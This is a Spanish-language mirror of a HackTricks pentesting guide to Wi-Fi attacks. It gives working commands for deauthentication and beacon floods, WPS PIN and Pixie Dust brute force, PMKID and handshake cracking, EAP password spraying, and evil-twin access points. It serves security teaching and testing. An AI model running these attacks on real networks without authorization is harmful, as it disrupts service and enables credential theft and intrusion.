Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/pentesting-wifi
History
Translator 50ff5bd11c Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene
2023-12-30 22:26:06 +00:00
..
basic-forensic-methodology f 2023-06-05 20:44:19 +02:00
evil-twin-eap-tls.md f 2023-06-05 20:44:19 +02:00
README.md Translated ['generic-methodologies-and-resources/exfiltration.md', 'gene 2023-12-30 22:26:06 +00:00

README.md

Pentesting Wifi

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Únete al servidor de HackenProof Discord para comunicarte con hackers experimentados y cazadores de recompensas por errores.

Perspectivas de Hacking
Interactúa con contenido que profundiza en la emoción y los desafíos del hacking.

Noticias de Hacking en Tiempo Real
Mantente al día con el mundo del hacking de ritmo rápido a través de noticias e insights en tiempo real.

Últimos Anuncios
Mantente informado con los lanzamientos de nuevas recompensas por errores y actualizaciones críticas de la plataforma.

Únete a nosotros en Discord y comienza a colaborar con los mejores hackers hoy mismo.

Comandos básicos de Wifi

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis

Herramientas

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Ejecutar airgeddon con docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

wifiphisher

Puede realizar ataques Evil Twin, KARMA y Known Beacons y luego usar una plantilla de phishing para lograr obtener la contraseña real de la red o capturar credenciales de redes sociales.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Esta herramienta automatiza ataques WPS/WEP/WPA-PSK. Automáticamente:

  • Configura la interfaz en modo monitor
  • Escanea redes posibles - Y te permite seleccionar la(s) víctima(s)
  • Si es WEP - Lanza ataques WEP
  • Si es WPA-PSK
  • Si es WPS: Ataque Pixie dust y el ataque de fuerza bruta (ten cuidado, el ataque de fuerza bruta puede llevar mucho tiempo). Ten en cuenta que no intenta PIN nulo o PINs de base de datos/generados.
  • Intenta capturar el PMKID del AP para descifrarlo
  • Intenta desautenticar clientes del AP para capturar un handshake
  • Si PMKID o Handshake, intenta fuerza bruta usando las 5000 contraseñas más comunes.

Resumen de Ataques

  • DoS
  • Desautenticación/desasociación -- Desconectar a todos (o un ESSID/Cliente específico)
  • APs falsos aleatorios -- Ocultar redes, posibles caídas de escáneres
  • Sobrecargar AP -- Intentar matar el AP (generalmente no muy útil)
  • WIDS -- Jugar con el IDS
  • TKIP, EAPOL -- Algunos ataques específicos para DoS algunos APs
  • Cracking
  • Descifrar WEP (varias herramientas y métodos)
  • WPA-PSK
  • WPS pin "Fuerza Bruta"
  • WPA PMKID fuerza bruta
  • [DoS +] WPA handshake captura + Descifrado
  • WPA-MGT
  • Captura de nombre de usuario
  • Fuerza bruta Credenciales
  • Evil Twin (con o sin DoS)
  • Open Evil Twin [+ DoS] -- Útil para capturar credenciales de portal cautivo y/o realizar ataques LAN
  • WPA-PSK Evil Twin -- Útil para ataques de red si conoces la contraseña
  • WPA-MGT -- Útil para capturar credenciales de empresa
  • KARMA, MANA, Loud MANA, Known beacon
  • + Open -- Útil para capturar credenciales de portal cautivo y/o realizar ataques LAN
  • + WPA -- Útil para capturar handshakes WPA

DOS

Paquetes de Desautenticación

La forma más común de realizar este tipo de ataque es con paquetes de desautenticación. Estos son un tipo de trama de "gestión" responsable de desconectar un dispositivo de un punto de acceso. Falsificar estos paquetes es la clave para hackear muchas redes Wi-Fi, ya que puedes desconectar forzosamente a cualquier cliente de la red en cualquier momento. La facilidad con la que esto se puede hacer es algo aterrador y a menudo se hace como parte de la recolección de un handshake WPA para descifrar.

Además de usar momentáneamente esta desconexión para recolectar un handshake para descifrar, también puedes simplemente dejar que esos deauths sigan llegando, lo que tiene el efecto de bombardear al cliente con paquetes de deauth aparentemente provenientes de la red a la que están conectados. Debido a que estas tramas no están cifradas, muchos programas aprovechan las tramas de gestión falsificándolas y enviándolas a uno o todos los dispositivos en una red.
Descripción de aquí.

Desautenticación usando Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 significa desautenticación
  • 1 es el número de desautenticaciones a enviar (puedes enviar varias si lo deseas); 0 significa enviarlas continuamente
  • -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
  • -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a desautenticar; si se omite, se envía una desautenticación de difusión (no siempre funciona)
  • ath0 es el nombre de la interfaz

Paquetes de Desasociación

Los paquetes de desasociación son otro tipo de trama de gestión que se utiliza para desconectar un nodo (es decir, cualquier dispositivo como una laptop o teléfono celular) de un punto de acceso cercano. La diferencia entre las tramas de desautenticación y desasociación es principalmente la forma en que se utilizan.

Un AP que busca desconectar un dispositivo no autorizado enviaría un paquete de desautenticación para informar al dispositivo que ha sido desconectado de la red, mientras que un paquete de desasociación se utiliza para desconectar cualquier nodo cuando el AP se está apagando, reiniciando o abandonando el área.

Descripción de aquí.

Este ataque se puede realizar con mdk4(modo "d"):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Más ataques DOS por mdk4

Desde aquí.

MODO DE ATAQUE b: Inundación de Beacons

Envía tramas beacon para mostrar APs falsos a los clientes. ¡Esto a veces puede colapsar escáneres de red e incluso controladores!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

MODO DE ATAQUE a: Denegación de Servicio de Autenticación

Envía tramas de autenticación a todos los APs encontrados en el rango. Demasiados clientes pueden congelar o reiniciar varios APs.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

MODO DE ATAQUE p: Sondeo de SSID y Fuerza Bruta

Sondea APs y verifica respuestas, útil para comprobar si el SSID ha sido correctamente desocultado y si el AP está dentro de tu rango de envío. La fuerza bruta de SSIDs ocultos con o sin una lista de palabras también está disponible.

MODO DE ATAQUE m: Explotación de Contramedidas Michael

Envía paquetes aleatorios o reinjecta duplicados en otra cola QoS para provocar Contramedidas Michael en APs TKIP. El AP se apagará durante un minuto entero, lo que lo convierte en un DoS efectivo.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

MODO DE ATAQUE e: Inyección de Paquetes EAPOL Start y Logoff

Inunda un AP con marcos EAPOL Start para mantenerlo ocupado con sesiones falsas e impide que maneje clientes legítimos. O desconecta a los clientes inyectando mensajes falsos EAPOL Logoff.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

MODO DE ATAQUE s: Ataques para redes de malla IEEE 802.11s

Varios ataques en la gestión de enlaces y enrutamiento en redes de malla. ¡Inunda vecinos y rutas, crea agujeros negros y desvía el tráfico!

MODO DE ATAQUE w: Confusión WIDS

Confunde/Abusa de los Sistemas de Detección y Prevención de Intrusiones conectando clientes de manera cruzada a múltiples nodos WDS o APs falsos y maliciosos.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

MODO DE ATAQUE f: Packet Fuzzer

Un fuzzer de paquetes simple con múltiples fuentes de paquetes y un buen conjunto de modificadores. ¡Ten cuidado!

Airgeddon

Airgeddon ofrece la mayoría de los ataques propuestos en los comentarios anteriores:

WPS

WPS significa Wi-Fi Protected Setup. Es un estándar de seguridad de red inalámbrica que intenta hacer que las conexiones entre un enrutador y dispositivos inalámbricos sean más rápidas y fáciles. WPS solo funciona para redes inalámbricas que usan una contraseña que está cifrada con los protocolos de seguridad WPA Personal o WPA2 Personal. WPS no funciona en redes inalámbricas que están utilizando la seguridad WEP obsoleta, la cual puede ser vulnerada fácilmente por cualquier hacker con un conjunto básico de herramientas y habilidades. (De aquí)

WPS utiliza un PIN de 8 dígitos para permitir que un usuario se conecte a la red, pero primero se verifica los primeros 4 números y, si son correctos, luego se verifica los segundos 4 números. Entonces, es posible hacer Brute-Force de la primera mitad y luego de la segunda mitad (solo 11000 posibilidades).

WPS Bruteforce

Hay 2 herramientas principales para realizar esta acción: Reaver y Bully.

  • Reaver ha sido diseñado para ser un ataque robusto y práctico contra WPS, y ha sido probado contra una amplia variedad de puntos de acceso e implementaciones de WPS.
  • Bully es una nueva implementación del ataque de fuerza bruta WPS, escrita en C. Tiene varias ventajas sobre el código original de reaver: menos dependencias, mejor rendimiento de memoria y CPU, manejo correcto de la endianness y un conjunto de opciones más robusto.

Este ataque aprovecha una debilidad en el código PIN de WPS de ocho dígitos; debido a este problema, el protocolo revela información sobre los primeros cuatro dígitos del PIN, y el último dígito funciona como un checksum, lo que facilita el brute forcing del AP WPS.
Tenga en cuenta que algunos dispositivos incluyen protecciones contra fuerza bruta, que generalmente bloquean direcciones MAC que intentan atacar repetidamente. En ese caso, la complejidad de este ataque aumenta, porque tendrías que rotar direcciones MAC mientras pruebas los PINs.

Si se encuentra el código WPS válido, tanto Bully como Reaver lo utilizarán para descubrir el PSK WPA/WPA2 utilizado para proteger la red, por lo que podrás conectarte siempre que lo necesites.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute force

En lugar de comenzar probando todos los PIN posibles, deberías verificar si hay PINs descubiertos para el AP que estás atacando (dependiendo del MAC del fabricante) y los PINs generados por software.

  • La base de datos de PINs conocidos está hecha para Puntos de Acceso de ciertos fabricantes para los cuales se sabe que usan los mismos PINs WPS. Esta base de datos contiene los primeros tres octetos de direcciones MAC y una lista de PINs correspondientes que son muy probables para este fabricante.
  • Hay varios algoritmos para generar PINs WPS. Por ejemplo, ComputePIN y EasyBox usan la dirección MAC del Punto de Acceso en sus cálculos. Pero el algoritmo de Arcadyan también requiere una ID de dispositivo.

Ataque WPS Pixie Dust

Dominique Bongard descubrió que algunos APs tienen formas débiles de generar nonces (conocidos como E-S1 y E-S2) que se supone que son secretos. Si podemos descubrir cuáles son estos nonces, podemos encontrar fácilmente el PIN WPS de un AP ya que el AP debe dárnoslo en un hash para probar que también conoce el PIN, y que el cliente no se está conectando a un AP falso. Estos E-S1 y E-S2 son esencialmente las "llaves para desbloquear la caja fuerte" que contiene el PIN WPS. Más información aquí: https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)

Básicamente, algunas implementaciones fallaron en el uso de claves aleatorias para encriptar las 2 partes del PIN (ya que se descompone en 2 partes durante la comunicación de autenticación y se envía al cliente), por lo que se podría utilizar un ataque offline para forzar bruscamente el PIN válido.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Ataque Null Pin

Algunas implementaciones realmente malas permitían la conexión con el PIN nulo (también muy extraño). Reaver puede probar esto (Bully no puede).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Todos los ataques WPS propuestos se pueden realizar fácilmente utilizando airgeddon.

  • 5 y 6 te permiten probar tu PIN personalizado (si tienes alguno)
  • 7 y 8 realizan el ataque Pixie Dust
  • 13 te permite probar el PIN NULO
  • 11 y 12 recopilarán los PINes relacionados con el AP seleccionado de bases de datos disponibles y generarán posibles PINes utilizando: ComputePIN, EasyBox y opcionalmente Arcadyan (recomendado, ¿por qué no?)
  • 9 y 10 probarán todos los PINes posibles

WEP

Tan roto y desaparecido que no voy a hablar de él. Solo debes saber que airgeddon tiene una opción WEP llamada "Todo en Uno" para atacar este tipo de protección. Más herramientas ofrecen opciones similares.

Únete al servidor de HackenProof Discord para comunicarte con hackers experimentados y cazadores de recompensas por errores.

Hacking Insights
Interactúa con contenido que profundiza en la emoción y los desafíos del hacking.

Noticias de Hacking en Tiempo Real
Mantente al día con el mundo del hacking de ritmo rápido a través de noticias e insights en tiempo real.

Últimos Anuncios
Mantente informado con los lanzamientos de nuevas recompensas por errores y actualizaciones cruciales de la plataforma.

Únete a nosotros en Discord y comienza a colaborar con los mejores hackers hoy mismo.

WPA/WPA2 PSK

PMKID

En 2018, los autores de hashcat divulgaron un nuevo tipo de ataque que no solo depende de un único paquete, sino que no requiere que ningún cliente esté conectado a nuestro AP objetivo, sino solo comunicación entre el atacante y el AP.

Resulta que muchos routers modernos añaden un campo opcional al final del primer marco EAPOL enviado por el propio AP cuando alguien se está asociando, el llamado Robust Security Network, que incluye algo llamado PMKID

Como se explica en la publicación original, el PMKID se deriva utilizando datos que nos son conocidos:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Dado que la cadena "PMK Name" es constante, conocemos tanto el BSSID del AP como de la estación y el PMK es el mismo obtenido de un handshake completo de 4 vías, ¡esto es todo lo que hashcat necesita para descifrar el PSK y recuperar la frase de paso! Descripción obtenida de aquí.

Para recolectar esta información y fuerza bruta localmente la contraseña puedes hacer:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Los PMKIDs capturados se mostrarán en la consola y también se guardarán dentro de _/tmp/attack.pcap_ Ahora, convierte la captura al formato de hashcat/john y descríptala:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Tenga en cuenta que el formato de un hash correcto contiene 4 partes, como: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838
__Si el suyo solo contiene 3 partes, entonces, es inválido (la captura de PMKID no fue válida).

Note que hcxdumptool también captura handshakes (algo así aparecerá: MP:M1M2 RC:63258 EAPOLTIME:17091). Podría transformar los handshakes al formato de hashcat/john utilizando cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

He notado que algunos handshakes capturados con esta herramienta no pudieron ser descifrados incluso sabiendo la contraseña correcta. Recomendaría capturar handshakes también de manera tradicional si es posible, o capturar varios de ellos usando esta herramienta.

Captura de Handshake

Una forma de atacar redes WPA/WPA2 es capturar un handshake e intentar descifrar la contraseña utilizada offline. Para hacerlo necesitas encontrar el BSSID y canal de la red víctima, y un cliente que esté conectado a la red.
Una vez que tienes esa información debes comenzar a escuchar toda la comunicación de ese BSSID en ese canal, porque con suerte el handshake será enviado allí:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

Ahora necesitas desautenticar al cliente por unos segundos para que se autentique automáticamente de nuevo al AP (por favor, lee la parte de DoS para encontrar varias formas de desautenticar a un cliente):

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work

Nota que como el cliente fue desautenticado, podría intentar conectarse a un AP diferente o, en otros casos, a una red diferente.

Una vez que en airodump-ng aparece información del handshake, esto significa que el handshake fue capturado y puedes dejar de escuchar:

Una vez capturado el handshake, puedes crackearlo con aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Verificar si el handshake está en el archivo

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Si esta herramienta encuentra un handshake incompleto de un ESSID antes que uno completo, no detectará el válido.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

Es importante hablar sobre los diferentes métodos de autenticación que podrían ser utilizados por una Wifi empresarial. Para este tipo de Wifis probablemente encontrarás en airodump-ng algo como esto:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

EAP (Protocolo de Autenticación Extensible) es la calavera de la comunicación de autenticación, sobre esto, un algoritmo de autenticación es utilizado por el servidor para autenticar al cliente (supplicant) y en algunos casos por el cliente para autenticar al servidor. Principales algoritmos de autenticación utilizados en este caso:

  • EAP-GTC: Es un método EAP para soportar el uso de tokens de hardware y contraseñas de un solo uso con EAP-PEAP. Su implementación es similar a MSCHAPv2, pero no utiliza un desafío entre pares. En cambio, las contraseñas se envían al punto de acceso en texto plano (muy interesante para ataques de degradación).
  • EAP-MD-5 (Message Digest): El cliente envía el hash MD5 de la contraseña. No recomendado: Vulnerable a ataques de diccionario, no hay autenticación del servidor y no hay forma de generar claves de privacidad equivalentes al cableado (WEP) por sesión.
  • EAP-TLS (Transport Layer Security): Se basa en certificados del lado del cliente y del servidor para realizar la autenticación y se puede utilizar para generar dinámicamente claves WEP basadas en el usuario y la sesión para asegurar las comunicaciones posteriores.
  • EAP-TTLS (Tunneled Transport Layer Security): Autenticación mutua del cliente y la red a través de un canal cifrado (o túnel), así como un medio para derivar claves WEP dinámicas, por usuario y por sesión. A diferencia de EAP-TLS, EAP-TTLS solo requiere certificados del lado del servidor (el cliente usará credenciales).
  • PEAP (Protocolo de Autenticación Extensible Protegido): PEAP es como el protocolo EAP pero creando un túnel TLS para proteger la comunicación. Luego, protocolos de autenticación débiles pueden ser utilizados sobre EAP ya que estarán protegidos por el túnel.
  • PEAP-MSCHAPv2: Esto también es conocido simplemente como PEAP porque es ampliamente adoptado. Esto es solo el vulnerable desafío/respuesta llamado MSCHAPv2 sobre PEAP (está protegido por el túnel TLS).
  • PEAP-EAP-TLS o simplemente PEAP-TLS: Es muy similar a EAP-TLS pero se crea un túnel TLS antes de que se intercambien los certificados.

Puedes encontrar más información sobre estos métodos de autenticación aquí y aquí.

Captura de Nombre de Usuario

Leyendo https://tools.ietf.org/html/rfc3748#page-27 parece que si estás utilizando EAP, los mensajes "Identity" deben ser soportados, y el nombre de usuario va a ser enviado en claro en los mensajes "Response Identity".

Incluso utilizando uno de los métodos de autenticación más seguros: PEAP-EAP-TLS, es posible capturar el nombre de usuario enviado en el protocolo EAP. Para hacerlo, captura una comunicación de autenticación (inicia airodump-ng dentro de un canal y wireshark en la misma interfaz) y filtra los paquetes por eapol.
Dentro del paquete "Response, Identity", aparecerá el nombre de usuario del cliente.

Identidades Anónimas

(Información tomada de https://www.interlinknetworks.com/app_notes/eap-peap.htm)

Tanto EAP-PEAP como EAP-TTLS soportan ocultamiento de identidad. En un entorno WiFi, el punto de acceso (AP) típicamente genera una solicitud de EAP-Identity como parte del proceso de asociación. Para preservar el anonimato, el cliente EAP en el sistema del usuario puede responder con solo suficiente información para permitir que el primer servidor RADIUS procese la solicitud, como se muestra en los siguientes ejemplos.

  • EAP-Identity = anonymous

En este ejemplo, todos los usuarios compartirán el pseudo-nombre de usuario “anonymous”. El primer servidor RADIUS es un servidor EAP-PEAP o EAP-TTLS que maneja el extremo del servidor del protocolo PEAP o TTLS. El tipo de autenticación interna (protegida) será entonces manejada localmente o proxy a un servidor RADIUS remoto (de origen).

  • EAP-Identity = anonymous@realm_x

En este ejemplo, los usuarios pertenecientes a diferentes reinos ocultan su propia identidad pero indican a qué reino pertenecen para que el primer servidor RADIUS pueda hacer proxy de las solicitudes EAP-PEAP o EAP-TTLS a servidores RADIUS en sus reinos de origen que actuarán como el servidor PEAP o TTLS. El primer servidor actúa puramente como un nodo de retransmisión RADIUS.

Alternativamente, el primer servidor puede actuar como el servidor EAP-PEAP o EAP-TTLS y procesar el método de autenticación protegido o hacer proxy a otro servidor. Esta opción puede ser utilizada para configurar diferentes políticas para diferentes reinos.

En EAP-PEAP, una vez que el servidor PEAP y el cliente PEAP establecen el túnel TLS, el servidor PEAP genera una solicitud de EAP-Identity y la transmite a través del túnel TLS. El cliente responde a esta segunda solicitud de EAP-Identity enviando una respuesta de EAP-Identity que contiene la verdadera identidad del usuario a través del túnel cifrado. Esto evita que cualquiera que esté escuchando el tráfico 802.11 descubra la verdadera identidad del usuario.

EAP-TTLS funciona ligeramente diferente. Con EAP-TTLS, el cliente típicamente se autentica a través de PAP o CHAP protegido por el túnel TLS. En este caso, el cliente incluirá un atributo User-Name y un atributo Password o CHAP-Password en el primer mensaje TLS enviado después de que se establezca el túnel.

Con cualquiera de los protocolos, el servidor PEAP/TTLS aprende la verdadera identidad del usuario una vez que se ha establecido el túnel TLS. La verdadera identidad puede ser en la forma user@realm o simplemente user. Si el servidor PEAP/TTLS también está autenticando al usuario, ahora conoce la identidad del usuario y procede con el método de autenticación que está siendo protegido por el túnel TLS. Alternativamente, el servidor PEAP/TTLS puede reenviar una nueva solicitud RADIUS al servidor RADIUS de origen del usuario. Esta nueva solicitud RADIUS tiene el protocolo PEAP o TTLS eliminado. Si el método de autenticación protegido es EAP, los mensajes EAP internos se transmiten al servidor RADIUS de origen sin el envoltorio EAP-PEAP o EAP-TTLS. El atributo User-Name del mensaje RADIUS saliente contiene la verdadera identidad del usuario, no la identidad anónima del atributo User-Name de la solicitud RADIUS entrante. Si el método de autenticación protegido es PAP o CHAP (solo soportado por TTLS), el User-Name y otros atributos de autenticación recuperados del payload TLS se colocan en el mensaje RADIUS saliente en lugar del User-Name anónimo y los atributos EAP-Message de TTLS incluidos en la solicitud RADIUS entrante.

EAP-Bruteforce (password spray)

Si se espera que el cliente utilice un nombre de usuario y contraseña (nota que EAP-TLS no será válido en este caso), entonces podrías intentar obtener una lista de nombres de usuario (ver la siguiente parte) y contraseñas e intentar fuerza bruta en el acceso utilizando air-hammer.

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

También podrías realizar este ataque utilizando eaphammer:

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Ataques a clientes Teoría

Selección de Red y Roaming

Aunque el protocolo 802.11 tiene reglas muy específicas que dictan cómo una estación puede unirse a un ESS, no especifica cómo la estación debe seleccionar un ESS para conectarse. Además, el protocolo permite que las estaciones se desplacen libremente entre puntos de acceso que comparten el mismo ESSID (porque no querrías perder la conectividad WiFi al caminar de un extremo a otro de un edificio, etc). Sin embargo, el protocolo 802.11 no especifica cómo se deben seleccionar estos puntos de acceso. Además, aunque las estaciones deben estar autenticadas al ESS para asociarse con un punto de acceso, el protocolo 802.11 no requiere que el punto de acceso esté autenticado a la estación.

Listas de Redes Preferidas (PNLs)

Cada vez que una estación se conecta a una red inalámbrica, el ESSID de la red se almacena en la Lista de Redes Preferidas (PNL) de la estación. La PNL es una lista ordenada de todas las redes a las que la estación se ha conectado en el pasado, y cada entrada en la PNL contiene el ESSID de la red y cualquier información de configuración específica de la red necesaria para establecer una conexión.

Escaneo Pasivo

En redes de infraestructura, los puntos de acceso transmiten periódicamente tramas de baliza para anunciar su presencia y capacidades a las estaciones cercanas. Las balizas son tramas de difusión, lo que significa que están destinadas a ser recibidas por todas las estaciones cercanas dentro del alcance. Las balizas incluyen información sobre las tasas soportadas por el AP, capacidades de cifrado, información adicional y, lo más importante, las tramas de baliza contienen el ESSID del AP (siempre que la difusión del ESSID no esté desactivada).

Durante el escaneo pasivo, el dispositivo cliente escucha las tramas de baliza de los puntos de acceso cercanos. Si el dispositivo cliente recibe una trama de baliza cuyo campo ESSID coincide con un ESSID de la PNL del cliente, el cliente se conectará automáticamente al punto de acceso que envió la trama de baliza. Luego, supongamos que queremos dirigirnos a un dispositivo inalámbrico que actualmente no está conectado a ninguna red inalámbrica. Si conocemos al menos una entrada en la PNL de ese cliente, podemos forzar al cliente a conectarse con nosotros simplemente creando nuestro propio punto de acceso con el ESSID de esa entrada.

Sondeo Activo

El segundo algoritmo de selección de red utilizado en 802.11 se conoce como Sondeo Activo. Los dispositivos clientes que utilizan sondeo activo transmiten continuamente tramas de solicitud de sondeo para determinar qué AP están al alcance, así como cuáles son sus capacidades. Las solicitudes de sondeo vienen en dos formas: dirigidas y de difusión. Las solicitudes de sondeo dirigidas están dirigidas a un ESSID específico y son la forma en que el cliente verifica si una red específica está cerca.

Los clientes que utilizan sondeo dirigido enviarán solicitudes de sondeo para cada red en su PNL. Cabe señalar que el sondeo dirigido es la única forma de identificar la presencia de redes ocultas cercanas. Las solicitudes de sondeo de difusión funcionan casi exactamente de la misma manera, pero se envían con el campo SSID establecido en NULL. Esto dirige la solicitud de sondeo de difusión a todos los puntos de acceso cercanos, permitiendo que la estación verifique si alguna de sus redes preferidas está cerca sin revelar el contenido de su PNL.

AP Simple con redirección a Internet

Antes de explicar cómo realizar ataques más complejos, se explicará cómo simplemente crear un AP y redirigir su tráfico a una interfaz conectada a la Internet.

Usando ifconfig -a verifica que la interfaz wlan para crear el AP y la interfaz conectada a Internet estén presentes.

DHCP & DNS

apt-get install dnsmasq #Manages DHCP and DNS

crear un archivo de configuración /etc/dnsmasq.conf de la siguiente manera:

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Entonces establece IPs y rutas:

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

Y luego inicia dnsmasq:

dnsmasq -C dnsmasq.conf -d

hostapd

apt-get install hostapd

Crear un archivo de configuración hostapd.conf:

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Detener procesos molestos, establecer modo monitor e iniciar hostapd:

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Reenvío y Redirección

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

Un ataque Evil Twin es un tipo de ataque Wi-Fi que se aprovecha del hecho de que la mayoría de las computadoras y teléfonos solo verán el "nombre" o ESSID de una red inalámbrica (ya que la estación base no está obligada a autenticarse contra el cliente). Esto hace que sea muy difícil distinguir entre redes con el mismo nombre y el mismo tipo de cifrado. De hecho, muchas redes tendrán varios puntos de acceso que extienden la red, todos usando el mismo nombre para expandir el acceso sin confundir a los usuarios.

Debido a cómo funciona la implementación de los clientes (recuerda que el protocolo 802.11 permite que las estaciones se muevan libremente entre puntos de acceso dentro del mismo ESS), es posible hacer que un dispositivo cambie la estación base a la que está conectado. Es posible hacerlo ofreciendo una mejor señal (lo cual no siempre es posible) o bloqueando el acceso a la estación base original (paquetes de desautenticación, interferencias o alguna otra forma de ataque DoS).

También ten en cuenta que las implementaciones inalámbricas en el mundo real suelen tener más de un punto de acceso, y estos puntos de acceso a menudo son más potentes y tienen un mejor alcance de línea de vista debido a su colocación hacia el techo. Desautenticar un solo punto de acceso generalmente resulta en que el objetivo se mueva hacia otro punto de acceso válido en lugar de tu AP falso, a menos que todos los puntos de acceso cercanos sean desautenticados (ruidoso) o seas muy cuidadoso con la colocación del AP falso (difícil).

Puedes crear un Evil Twin Abierto muy básico (sin capacidad para enrutar tráfico a Internet) haciendo:

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

También podrías crear un Gemelo Maligno utilizando eaphammer (ten en cuenta que para crear gemelos malignos con eaphammer la interfaz NO debe estar en modo monitor):

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

